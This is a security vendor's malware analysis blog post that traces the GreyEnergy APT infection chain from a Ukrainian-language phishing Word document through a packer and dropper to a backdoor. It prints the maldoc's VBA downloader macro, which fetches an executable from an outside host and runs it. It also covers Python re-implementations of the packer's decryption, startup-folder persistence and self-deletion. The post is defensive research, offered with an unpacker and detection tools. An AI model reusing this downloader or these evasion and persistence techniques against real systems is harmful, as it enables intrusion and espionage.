Analyzing the GreyEnergy Malware: from Maldoc to Backdoor

GreyEnergy is an Advanced Persistent Threat (APT) that has been targeting industrial networks in Ukraine and other Eastern European countries for the past several years. Last month we published an overview of the malware’s components and let our customers know they will receive alerts if GreyEnergy is present in their systems.

Since then, I have taken a deep dive into one of the infection methods of GreyEnergy, the phishing email that sends a malicious Microsoft Word document (Maldoc) to targeted organizations. This article provides a detailed description of how the malware works, from the moment that someone receives the phishing email, until the malware (backdoor) is installed in their system.

My comments are made from the point of view of a security analyst who’s trying to understand the functionality of GreyEnergy step by step. They are intended to help the ICS security community stay on top of the latest threats and help others identify GreyEnergy in their industrial networks, or in the wild.

In conjunction with this article, Nozomi Networks has published a free tool for security analysts, the GreyEnergy Unpacker. It is an easy-to-run Python script that automatically unpacks the dropper and backdoor protected by the packer which is downloaded by the maldoc, facilitating further analysis.

GreyEnergy Maldoc to Backdoor Overview

Diagram 1: The GreyEnergy malware components and high-level flow, from Maldoc to Backdoor.

The GreyEnergy ICS malware uses a common infection method: phishing emails with infected documents. However, the malware’s code is anything but common. It is well written, smartly put together and designed to defeat detection by cybersecurity products. Diagram 1 shows the high-level flow of the malware. The engineering techniques used to implement this flow are described in detail in this article.

GreyEnergy Stage 0 – Malicious Word Document

The attack starts when someone receives a malicious Word Document in their email inbox (SHA-1 177AF8F6E8D6F4952D13F88CDF1887CB7220A645).

The document is written in Ukrainian, and at first glance, it looks very suspicious. Not only are images present, but a security warning is clearly shown at the top of the page, related to the presence of macros.

When the malicious Word document is first opened, this is what it looks like.

Scrolling down, the reader is presented with a fake interactive form. At this point the person continues to see the Security Warning at the top of the page, but they also see red text that advises them to enable the macros, i.e. click on the “Enable Content” button in the warning.

This is a clear attempt to trick the person into executing the malicious code.

The red warning at the top of the page encourages viewers to interact with the form.
Translated into English, the red warning text encourages viewers to enable macro execution.

Now let’s dive into a technical analysis to understand how this document works.

The first step is to start FakeNet-NG in order to capture all of the network traffic generated once the document has been opened. Once the document is opened, it tries to load a remote image; it happens even before enabling the macros.

At this point the macros are still disabled, so no code can be executed. The most likely purpose of this request is to track how many users opened the document, as a minimal metric of success.

The highlighted code is shown in detail below.

This code is the HTTP GET request that is performed automatically by the malicious document.

GET /img/rKPGshUCwICOdqe1P8Ig5oere:dmykCedtG2zar.png HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 16)
Accept-Encoding: gzip, deflate
Host: pbank.co.ua
Connection: Keep-Alive

Now it’s time to move on to the real malicious code. It is easily decompressed and extracted using the great tool oledump, as shown below:

C:\oledump_V0_0_38>python oledump.py maldoc.doc
A: word/vbaProject.bin
 A1:       513 'PROJECT'
 A2:        41 'PROJECTwm'
 A3: M   15178 'VBA/ThisDocument'
 A4:      3940 'VBA/_VBA_PROJECT'
 A5:      3656 'VBA/__SRP_0'
 A6:       655 'VBA/__SRP_1'
 A7:      5220 'VBA/__SRP_2'
 A8:       939 'VBA/__SRP_3'
 A9:       782 'VBA/dir'
B: word/activeX/activeX13.bin
 B1:       128 '\x01CompObj'
 B2:        92 'contents'

C:\oledump_V0_0_38>python oledump.py -s A3 -v -e maldoc.doc
Function HashCheck()
    On Error Resume Next
    Set s = CreateObject(B64Dec("d3NjcmlwdC5zaGVsbA=="))
    Set h = CreateObject(B64Dec("bXN4bWwyLnhtbGh0dHA="))
    p = s.ExpandEnvironmentStrings("%temp%") & B64Dec("XFRWVU5TUzMuZXhl")
    h.Open "get", B64Dec("aHR0cDovL3BiYW5rLmNvLnVhL2Zhdmljb24uaWNv"), False
    h.send
    With CreateObject(B64Dec("YWRvZGIuc3RyZWFt"))
         .Type = 1
         .Open
         .Write h.responsebody
         .savetofile p, 2
         .Close
    End With
    s.Run p
End Function
Sub Test()
    Call HashCheck
End Sub
<cut>
Private Sub Document_Open()
  Call Test
End Sub
<cut>

(Part of the output has been removed in order to focus on the important parts of the code.)

The function Document_Open() is automatically executed once the user clicks on the “Enable Content” button. It calls the function Test(), which in turn calls HashCheck(), the function that contains the malicious code.

The HashCheck() function is a common downloader found in most malicious macros. Its main purpose is to download a malware component from a remote location, store it inside the system and, finally, execute it.

The attacker tried to obfuscate the strings using Base64 encoding, but that encoding can be easily reversed. The main purpose was not to protect the strings, but rather to avoid pattern-based detection performed by cybersecurity products. The following code snippet shows the downloader with its strings decoded:

Function HashCheck()
    On Error Resume Next
    Set s = CreateObject("wscript.shell")
    Set h = CreateObject("msxml2.xmlhttp")
    p = s.ExpandEnvironmentStrings("%temp%") & "\TVUNSS3.exe"
    h.Open "get", "http://pbank[.]co[.]ua/favicon.ico", False
    h.send
    With CreateObject("adodb.stream")
         .Type = 1
         .Open
         .Write h.responsebody
         .savetofile p, 2
         .Close
    End With
    s.Run p
End Function
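The decoding step is easy to reproduce outside of Word. The following is a minimal sketch using Python's standard base64 module. The helper name decode_macro_string is hypothetical (it is not part of the macro), and the sketch assumes the decoded strings are plain ASCII.

```python
import base64

# Base64 literals copied verbatim from the macro listing.
ENCODED_STRINGS = [
    "d3NjcmlwdC5zaGVsbA==",
    "bXN4bWwyLnhtbGh0dHA=",
    "XFRWVU5TUzMuZXhl",
    "aHR0cDovL3BiYW5rLmNvLnVhL2Zhdmljb24uaWNv",
    "YWRvZGIuc3RyZWFt",
]


def decode_macro_string(encoded: str) -> str:
    """Reverse the macro's B64Dec() call (assumes ASCII output)."""
    return base64.b64decode(encoded).decode("ascii")


# Decode every literal in the order it appears in the macro.
decoded_strings = [decode_macro_string(item) for item in ENCODED_STRINGS]

if __name__ == "__main__":
    for encoded, decoded in zip(ENCODED_STRINGS, decoded_strings):
        print(f"{encoded} -> {decoded}")
```

Running the script prints each encoded literal next to its cleartext value, which is how the decoded listing can be checked.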

The macro connects to the remote host: http://pbank[.]co[.]ua/favicon[.]ico and downloads a packed dropper designed to implant a persistent backdoor inside the system.

The executables of both the dropper and the backdoor are contained inside the packer itself, encrypted with a custom algorithm and compressed with a variant of LZW.

Let’s continue the analysis to find out how the packer works.

GreyEnergy Stage 1 – Packer

The packer (SHA-1 51309371673acd310f327a10476f707eb914e255) downloaded by the Word document is a C++ 32-bit Windows executable compiled on 2012-01-17 03:24:07 (according to the PE header).

The executable is not signed or protected using any known packer, but it contains a large number of anti-analysis techniques spread throughout the code, which are described below. The PE header and the sections do not contain anything that indicates anomalies or packed code.

No suspicious indicators are found in the executable’s sections.

What is a packer? It’s an executable that encrypts and compresses another executable inside it, implementing various anti-analysis techniques to make it very difficult to investigate and understand. Packers are legitimately used to protect code that is the intellectual property of a person or company. In this case, however, the packer is used by the threat actor to hide the malware. It uses many techniques to make it hard for the security analyst to identify the true malicious code.

How do you recognize a packer? Usually a packer has the following characteristics and capabilities. It:

  • Unpacks the original executable into memory
  • Resolves imports of the original executable
  • Relocates the binary
  • Transfers the execution to the original entry point
  • Contains few imports
  • Includes specific packer sections (like UPX0)
  • Involves abnormal section sizes
  • Uses anti-analysis techniques, largely involving:
      • anti-debugging
      • anti-VM
      • junk code
      • and more

Let’s go deeper into the analysis to understand what characteristics flag the executable as a packer.

Overlay Data

Observing the file closely, I noticed that the executable carries encrypted data appended to its end (an overlay), starting at the raw offset 0xD800 (SHA-1 of the overlay data: BD67AE6C9C4C5DEE10FD8E889133427BF42D0580).

The first assumption, confirmed during the analysis, is that the data appended at the end of the file is an additional component that is decrypted somehow during run-time. This is not necessarily a malicious indicator, because several Windows installers use overlays to store data to be installed on a system. But it could be a piece of the puzzle.

Shown above is data appended to the end of the file and not presented in the PE header.

Static Analysis

Opening the dropper in IDA Pro, it’s immediately evident that the executable has been compiled using several anti-analysis techniques like junk code, anti-forensics, overlapping instructions and a massive use of JMPs. It could be an indicator that the analyzed file is a packer or, in general, is code that the developer wants to protect.

That’s not enough evidence yet, though, that there is malicious code inside.

This sample shows junk code, overlapping instructions and widespread use of JMPs.

Although a static analysis approach would be feasible, I decided to focus on dynamic analysis in order to speed up the investigation.

From this point forward, the information was obtained by debugging the malware with the excellent x64dbg.

Hardcoded Imports

The most important WinAPIs called by the packer are not contained in the PE import table, since the attacker decided to load them at runtime. The API names are pushed onto the stack using a mov instruction, without using any kind of obfuscation technique.

A mov instruction is used to push API names onto the stack.

Once the API’s name is loaded into memory, the malware needs to find where the related code is actually located in memory. As the libraries needed are already loaded in the process address space, the malware parses the PE header of the loaded library to access its export table and, subsequently, find the right API address.

GreyEnergy parses the PE header to access the export table of kernel32.dll, which is loaded into memory.

Using this method, addresses for the following APIs are identified:

  • CreateFileW
  • GetFileSize
  • LocalAlloc
  • ReadFile
  • CloseHandle

The malware implements a basic anti-forensic technique by overwriting all strings with zeros, after the strings have been loaded in memory.

The algorithm is simple and consists of overwriting all bytes of the string with a byte provided by the wipe function (fixed to 0x00 in the sample analyzed).

The wipe algorithm overwrites the string “GetFileSize” with 0x00s.
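The wipe routine described above can be sketched in a few lines of Python. This is an illustration of the idea rather than a transcription of the malware's code: the function name wipe and its signature are assumptions, and the fill byte defaults to 0x00 as observed in the analyzed sample.

```python
def wipe(buffer: bytearray, fill: int = 0x00) -> None:
    """Overwrite every byte of buffer in place with the fill byte."""
    for index in range(len(buffer)):
        buffer[index] = fill


# Example: the API name is needed only until its address is resolved.
api_name = bytearray(b"GetFileSize")
wipe(api_name)  # the buffer keeps its length but now holds only 0x00 bytes
```

After the call, a memory dump of the buffer no longer reveals which API name was used.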

Thus far there are multiple indicators that strongly suggest that the binary is a packer:

  • Apparently encrypted overlay
  • Anti-analysis techniques
  • APIs manually resolved by parsing the PE header
  • Strings hardcoded inside the code and overwritten with 0x00s after use

Accessing the Overlay Data

As suggested at the start of the analysis, the malware now tries to access the data appended at the end of the file. In order to do that, it copies itself into memory, using the five APIs previously identified, with the purpose of parsing the PE header and locating the exact offset where the overlay starts.

The first thing the malware needs to do, is access itself using CreateFileW, which returns a handle to the opened file.

The malware gets the handle 0xC8, which represents a link to itself on the disk.

The second thing required is the exact size of the executable, to know how much space to allocate in memory. The API GetFileSize is called with the file handle obtained earlier and returns the size of the file.

The second parameter 0x00 passed is a pointer to the variable where the high-order doubleword of the file size is returned. In this case it was set to NULL, because the application did not require the high-order doubleword.

The malware gets the size of its own executable.

Now that the malware has a handle to itself on the disk, and the exact size in bytes of the executable, it is ready to allocate space inside the memory for itself.

At this point there are strong indicators that what we are looking at is a packer, because of the overlay access and because of the widespread anti-analysis techniques used throughout the code. However, we could be looking at something like an installer stub accessing the overlay.

The API LocalAlloc allocates bytes on the heap and initializes them to 0x00, because the flag LMEM_ZEROINIT (0x40) is passed in the call. The function returns the address of the allocated memory in the register EAX; in this case it is 0x00526E68.

Here the malware is allocating enough space in memory to store the hidden executable.

At this point the suspected packer has the address in memory where it will store itself. The next step is to read the file from the disk and store it in the allocated memory space. To do that, the following important information is involved:

  • 0xC8 → handle to the file to read
  • 0x00526E68 → address of the allocated memory
  • 0x1D000 → size of the file (amount of data to read)

The data contained inside the executable on the disk is copied into memory.

The final step performed by the malware is to close the handle using the API CloseHandle. The handle 0xC8 is released and is no longer usable.
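The open, size, allocate, read and close sequence described above has a direct analogue in portable Python. The sketch below is not the packer's code and does not call the Windows APIs; it only mirrors the order of the five steps, and the function name read_file_into_memory is an assumption made for illustration.

```python
import os


def read_file_into_memory(path: str) -> bytearray:
    """Copy a file into a zero-initialized buffer, step by step."""
    handle = open(path, "rb")                      # analogue of CreateFileW
    try:
        size = os.fstat(handle.fileno()).st_size   # analogue of GetFileSize
        buffer = bytearray(size)                   # analogue of LocalAlloc with LMEM_ZEROINIT
        handle.readinto(buffer)                    # analogue of ReadFile
    finally:
        handle.close()                             # analogue of CloseHandle
    return buffer
```

An analyst can call read_file_into_memory on a copy of the sample to get the same in-memory view of the file that the packer works on, including the overlay.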

Now that the malware has copied itself into memory, it needs to point at the overlay data somehow. In order to do that, it will manually parse the PE header, traveling through the sections. Before going ahead, let’s take a look at how the PE file is formed.

The red box in the image below shows all the categories contained inside the header. Each of them contains several fields describing specific useful information like the entry point of the executable, the APIs called, the compilation timestamp, how the data is structured inside the file and so on.

The last part of the PE header is the Section Headers, which describes how the file’s sections are organized, including their sizes and offsets.

Overview of the structure of the internal executable.

Accessing the last entry, representing the section called .rsrc, it’s possible to extract the offset start point and the section size. Knowing this information, it’s possible to calculate the exact address where the section ends:

  • 0xD600 → Raw Address where the section is located
  • 0x200 → Raw Size of the section

The bottom of the image shows the section ending with the common padding text PADDINGXX.

Doing a simple addition, 0xD600 + 0x200 = 0xD800, it’s possible to determine where the file ends and where the appended data starts.

Let’s find out what’s present at that offset using a hex editor:

Shown above is the end of the file as described in the PE header, followed by the appended data.

There it is! The suspicious overlay data noticed at the beginning of the analysis starts exactly at the end of the .rsrc section. Using that strategy, the malware is going to parse the PE header, iterating over all the sections and performing the addition on the last section. When done, it obtains the right overlay offset.
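The same calculation can be scripted. The sketch below is a minimal illustration using only Python's struct module and the standard PE layout (40-byte section headers, with SizeOfRawData at offset 16 and PointerToRawData at offset 20). The function name overlay_offset is an assumption, and instead of trusting the last section only, it keeps the largest end offset across all sections, which gives the same result when sections are stored in ascending order, as in this sample.

```python
import struct


def overlay_offset(pe: bytes) -> int:
    """Return the raw offset where the last section ends (overlay start)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # COFF file header follows the 4-byte PE signature.
    (num_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (optional_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    section_table = e_lfanew + 24 + optional_size
    end = 0
    for index in range(num_sections):
        header = section_table + index * 40
        raw_size, raw_pointer = struct.unpack_from("<II", pe, header + 16)
        end = max(end, raw_pointer + raw_size)
    return end
```

For the analyzed packer, the .rsrc values 0xD600 and 0x200 yield 0xD800, and any bytes in the file from that offset onward are overlay data.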

Starting from that offset, the malware reads 40 bytes that will be used to initialize an array of 256 bytes through the following small algorithm (re-implemented in Python):

def init_keymap(key):
    ikey = 0
    keysum = 0
    keymap = bytearray([i for i in range(256)])
    for idx in range(len(keymap)):
        keysum = (keysum + key[ikey] + keymap[idx]) % 256
        keymap[idx], keymap[keysum] = keymap[keysum], keymap[idx]
        ikey = (ikey + 1) % len(key)
    return keymap

The initialized array is required by the decryption algorithm because it is the secret key (from now on referred to as keymap) needed to decrypt the protected overlay data.

The decryption function uses the keymap internally and takes two arguments: the output buffer, which provides the location for the decrypted data, and the length of that buffer.

The location for the decrypted data and the length of the buffer are identified.

The decryption algorithm is very simple and has been re-implemented with the following Python code:

def decrypt(cipher, keymap):
    ikey = 1
    keysum = 0
    for idx in range(len(cipher)):
        keysum = (keysum + keymap[ikey]) % 256
        keymap[ikey], keymap[keysum] = keymap[keysum], keymap[ikey]
        keymap_idx = (keymap[ikey] + keymap[keysum]) % 256
        cipher[idx] ^= keymap[keymap_idx]
        ikey = (ikey + 1) % 256
    return cipher
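It is worth noting that the two routines have the same structure as the key-scheduling and keystream-generation steps of the RC4 stream cipher, so the same XOR operation both encrypts and decrypts. The self-contained sketch below restates both routines and shows a round trip. The 40-byte key and the payload are made-up values for illustration only; the real key is read from the overlay. Unlike the listing above, this version works on copies so that the keymap can be reused.

```python
def init_keymap(key: bytes) -> bytearray:
    """Build the 256-byte keymap from the key."""
    keymap = bytearray(range(256))
    keysum = 0
    for idx in range(256):
        keysum = (keysum + key[idx % len(key)] + keymap[idx]) % 256
        keymap[idx], keymap[keysum] = keymap[keysum], keymap[idx]
    return keymap


def decrypt(cipher: bytes, keymap: bytearray) -> bytes:
    """XOR the data with the keystream derived from the keymap."""
    state = bytearray(keymap)  # work on a copy, leave the caller's keymap intact
    out = bytearray(cipher)
    ikey, keysum = 1, 0
    for idx in range(len(out)):
        keysum = (keysum + state[ikey]) % 256
        state[ikey], state[keysum] = state[keysum], state[ikey]
        out[idx] ^= state[(state[ikey] + state[keysum]) % 256]
        ikey = (ikey + 1) % 256
    return bytes(out)


# Hypothetical 40-byte key and payload, used only to show the round trip.
key = bytes(range(40))
payload = b"MZ example payload"
keymap = init_keymap(key)
ciphertext = decrypt(payload, keymap)    # applying the routine once encrypts
recovered = decrypt(ciphertext, keymap)  # applying it again restores the data
```

Because the operation is symmetric, the same function can be used to build test fixtures when writing an unpacker.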

Having a look at the beginning of the output buffer, it is immediately clear that the data contains an executable, because of the presence of the signature 0x4D5A (“MZ”). Looking closely, however, there are several unexpected bytes between the recognized patterns, indicating that the data has not been completely reconstructed yet.

Usually, the PE header contains several sequences of zeros, which are not present in the decrypted buffer, suggesting that it could be compressed somehow.

This time my assumption is quickly confirmed: about ten instructions later, a function is called whose parameters are the offset of the decrypted data, its size and a pointer to a new, previously allocated buffer. After this function executes, the new buffer contains a valid PE header, confirming that the data was compressed.

The buffer containing the uncompressed binary is identified.

Next, the packer points to the uncompressed buffer, parses the PE header, and iterates over all the sections again. The technique is very similar to the previous one. This time, however, the goal is to point precisely to the start of the data appended to the uncompressed binary.

Accessing the overlay data reveals that it contains a second PE header, which is the real malicious component (backdoor) waiting to be installed inside the victim’s system.

Diagram 2: The flow executed by the Packer includes decryption and decompression of the Dropper and Backdoor.

At this point it’s possible to identify two specific components from the unpacked data, the dropper and the backdoor.
The next step is to execute the dropper in-memory without storing it inside the filesystem. To achieve that goal, the following steps are taken by the binary:

  • A new buffer is allocated in the virtual address space of the packer using the API VirtualAlloc. Then, all the sections of the dropper are copied inside it.
  • All the imports contained inside the PE header are resolved using the APIs LoadLibrary and GetProcAddress.
  • All the sections’ permissions are set in accordance with the PE header using the API VirtualProtect.
  • The dropper binary is relocated in accordance with the .reloc section.

Once all the steps are done, the dropper executable is correctly loaded into memory waiting to be executed. This is the final confirmation that the binary is a packer, because it meets all the primary characteristics of packers.
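To make the first of the loading steps above more concrete, the sketch below maps the sections of a PE file into a buffer at their virtual addresses, which is what a manual loader does after allocating memory. It is a simplified illustration, not the packer's code: the function name map_sections is an assumption, a bytearray stands in for the memory returned by VirtualAlloc, and import resolution, page permissions and relocations are deliberately left out.

```python
import struct


def map_sections(pe: bytes) -> bytearray:
    """Lay out headers and sections as they would appear in memory."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    (num_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (optional_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    optional = e_lfanew + 24
    # SizeOfImage and SizeOfHeaders sit at offsets 56 and 60 of the optional header.
    size_of_image, size_of_headers = struct.unpack_from("<II", pe, optional + 56)
    image = bytearray(size_of_image)  # stand-in for the VirtualAlloc buffer
    image[:size_of_headers] = pe[:size_of_headers]
    section_table = optional + optional_size
    for index in range(num_sections):
        header = section_table + index * 40
        _vsize, vaddr, raw_size, raw_pointer = struct.unpack_from("<IIII", pe, header + 8)
        data = pe[raw_pointer:raw_pointer + raw_size]
        image[vaddr:vaddr + len(data)] = data  # copy raw bytes to the virtual address
    return image
```

The sketch assumes a well-formed file whose sections fit inside SizeOfImage; a real loader would validate every field before using it.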

The packer extracts the entry point address (which describes where the code starts inside the binary) from the PE header of the dropper, and jumps to it using an unconditional JMP instruction. From that point on, the execution flow migrates from the packer’s code to the dropper’s code.

This is easy to notice, because the execution flow leaves the packer’s code section, located at the offset 0x0040100, and jumps to a completely different one, 0x0021964. This last address was allocated by the OS through the VirtualAlloc API, so it can be different each time the packer is executed.

The execution flow jumps from the packer to the dropper code using the JMP instruction.

GreyEnergy Stage 2 – Dropper
The dropper is a very small piece of code whose purpose is to drop the real malware inside the victim’s system. A part of the dropper’s mission is to make the malware persistent, so it will survive an eventual system reboot. Luckily the dropper is not protected against analysis as the packer was, so it is easier to follow the logic flow.

Single Execution

The malware has probably been developed to run as a single instance, because the dropper checks whether another instance is already running by means of a mutex whose name is unique to the system. The name is obtained dynamically using the API GetCurrentHwProfileA: the field szHwProfileGuid of the returned hardware profile is used as the name when opening the mutex. If the mutex already exists, the process terminates itself.

The dropper checks for the presence of a unique name, using the field szHwProfileGuid, and terminates if it’s found.

String Encryption

All the strings used by the dropper are encrypted and stored inside the section .rdata, which usually contains all the read-only data.

The algorithm to decrypt the strings is a simple XOR. In this case, though, every string has its own 4-byte XOR key, which is declared at the beginning of the string itself. Even though a 4-byte key is used by the analyzed sample, the data structure appears to support an XOR key of up to 8 bytes (in the screenshot below it is possible to see 0x00 repeated 4 times).

The decryption of the Dropper strings uses a 4-byte XOR key, although the data structure supports up to an 8-byte key.

The XOR-based algorithm chosen to encrypt the strings is easy to break, but it does protect against string extraction analysis. If the suspicious strings were stored in cleartext, they could trigger alarms by pattern-based security systems.
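A repeating-key XOR of this kind takes only a few lines to reproduce. The sketch below is a generic illustration: the function name xor_decrypt, the key value and the sample string are all made up, and the exact layout of the dropper's string records (how the key field and the ciphertext are delimited) is not modeled here.

```python
from itertools import cycle


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed."""
    return bytes(byte ^ key_byte for byte, key_byte in zip(data, cycle(key)))


# Hypothetical 4-byte key and string, used only to show the round trip.
sample_key = bytes.fromhex("a1b2c3d4")
encrypted = xor_decrypt(b"rundll32.exe", sample_key)
decrypted = xor_decrypt(encrypted, sample_key)  # XOR is its own inverse
```

Since the key is stored next to each string, an analyst who understands the record layout can decrypt every string statically without running the dropper.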

Malware Dropping

The dropper obtains the path to the Windows tool rundll32.exe dynamically, which is an indicator that the malicious component it is going to execute is a DLL file. The backdoor is dropped inside the directory %APPDATA%\Microsoft\ using a random GUID as its name and the extension .db. Changing the file extension is a basic social engineering technique to trick the victim into thinking that the file is something harmless, while it actually contains malicious executable code.

The malicious backdoor has the file extension .db, to trick the victim into thinking the file is harmless.
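The naming scheme described above suggests a simple hunting check: look for files named like a braced GUID with a .db extension whose content starts with the MZ signature of an executable. The sketch below is an assumption-laden illustration, not a detection rule from this analysis. The function name find_disguised_dlls is hypothetical, the directory to scan is supplied by the caller, and matching files still need manual review.

```python
import re
from pathlib import Path

# Matches names such as {4591E270-719A-4B01-A63C-C5B75CF04830}.db
GUID_DB_NAME = re.compile(
    r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}\.db$"
)


def find_disguised_dlls(directory: str) -> list:
    """Return names of GUID-named .db files that start with 'MZ'."""
    hits = []
    for entry in Path(directory).iterdir():
        if not entry.is_file() or not GUID_DB_NAME.match(entry.name):
            continue
        with entry.open("rb") as handle:
            if handle.read(2) == b"MZ":  # executable signature, not a database
                hits.append(entry.name)
    return sorted(hits)
```

On an affected machine the function would be pointed at the Microsoft folder under %APPDATA%.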

Set Persistence

In order to survive a system reboot, the dropper creates a link file with a blank name %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\          .lnk (10 space characters) pointing to the malicious file dropped in %APPDATA% using the following command:

C:\Windows\SysWOW64\rundll32.exe {4591E270-719A-4B01-A63C-C5B75CF04830}.db,#1

As the dropped backdoor {4591E270-719A-4B01-A63C-C5B75CF04830}.db is a DLL file, it needs a stub able to run its exported function. In order to do that, the dropper uses the system utility rundll32.exe to call the function #1 exported by the DLL.
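The blank shortcut name is itself a usable indicator. The following sketch lists .lnk files in a folder whose name, apart from the extension, consists only of whitespace. It is a hedged illustration: the function name find_blank_named_links is hypothetical, the Startup folder path must be supplied by the caller, and a hit only means the shortcut deserves a closer look.

```python
from pathlib import Path


def find_blank_named_links(startup_dir: str) -> list:
    """Return .lnk file names made up only of whitespace before the extension."""
    hits = []
    for entry in Path(startup_dir).iterdir():
        name = entry.name
        if len(name) <= 4 or not name.lower().endswith(".lnk"):
            continue
        if name[:-4].strip() == "":  # nothing but spaces in front of ".lnk"
            hits.append(name)
    return sorted(hits)
```

A shortcut created by this dropper would show up in the result as ten spaces followed by .lnk.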

Execute the Installed Backdoor

Finally, the dropper is ready to execute the real piece of malware installed inside the victim’s system. The command used to run the backdoor is the same as the one used to ensure survival of a reboot:

C:\Windows\SysWOW64\rundll32.exe {4591E270-719A-4B01-A63C-C5B75CF04830}.db,#1

Once the backdoor is executed inside the system, the dropper performs a final action to clean up traces of the infection. It uses the API ShellExecuteW to execute the following command in the system’s shell:

[Image: the cleanup command passed to ShellExecuteW, combining ping and del]

The most important part of the string above is the command del, which deletes the packer’s executable that started the execution flow described so far. The command ping sends 4 ICMP packets to the system’s loopback interface, and seems to be a decoy to cover up the fact that the packer will be deleted from the filesystem.

The last API called is ExitProcess, which terminates the execution of the packer after the dropper’s code has been executed inside its address space.

A Stealthy Infection with Potentially Dangerous Consequences

Having completed my analysis, it’s evident that the GreyEnergy packer does a great job of slowing down the reverse engineering process. The techniques used are not new, but both the tools and the tactics employed were wisely selected.

For example, the threat actor chose to implement custom algorithms that are not too difficult to defeat, but are hard enough to protect the malicious payload. Additionally, the broad use of anti-forensic techniques, such as the wiping of in-memory strings, underlines the attacker’s attempt to stay stealthy and have the infection go unnoticed.

To learn how the GreyEnergy attack proceeds post infection, see my earlier summary blog, or refer to the initial, detailed ESET report. Notably, GreyEnergy appears to have been used for espionage campaigns only, as it does not include any module capable of infecting industrial control systems.

However, ESET concludes its report with “GreyEnergy is an important part of the arsenal of one of the most dangerous APT groups that has been terrorizing Ukraine for the past several years.” It’s possible that GreyEnergy could evolve to include modules capable of damaging critical infrastructure in the future.

My work reverse engineering GreyEnergy informs the threat detection capabilities of Nozomi Networks offerings, including our new Threat Intelligence service. It uses advanced techniques for identifying GreyEnergy, or its variants, on industrial networks.

Free Tool Facilitates Further GreyEnergy Analysis

As a direct result of this analysis, I have developed a GreyEnergy Unpacker. It’s a Python script that automatically unpacks both the dropper and the backdoor, extracting them to disk, and it is freely available on GitHub. Using it saves you the reverse engineering work explained here, and it is intended to help facilitate further GreyEnergy analysis.

Update February 2019: Research Paper Now Available

Since the publication of this blog, I performed additional analysis of the GreyEnergy stages described above. My deepest investigation was done on the packer, and my comprehensive reverse engineering analysis is provided in the research paper available below.

Also linked to below are:

  • A further blog article on this topic, that summarizes the techniques used by the packer to conceal its true functionality
  • An updated GitHub link that now provides two GreyEnergy tools. The additional new tool is the GreyEnergy Yara Module, which determines whether a file processed by Yara is the GreyEnergy packer or not.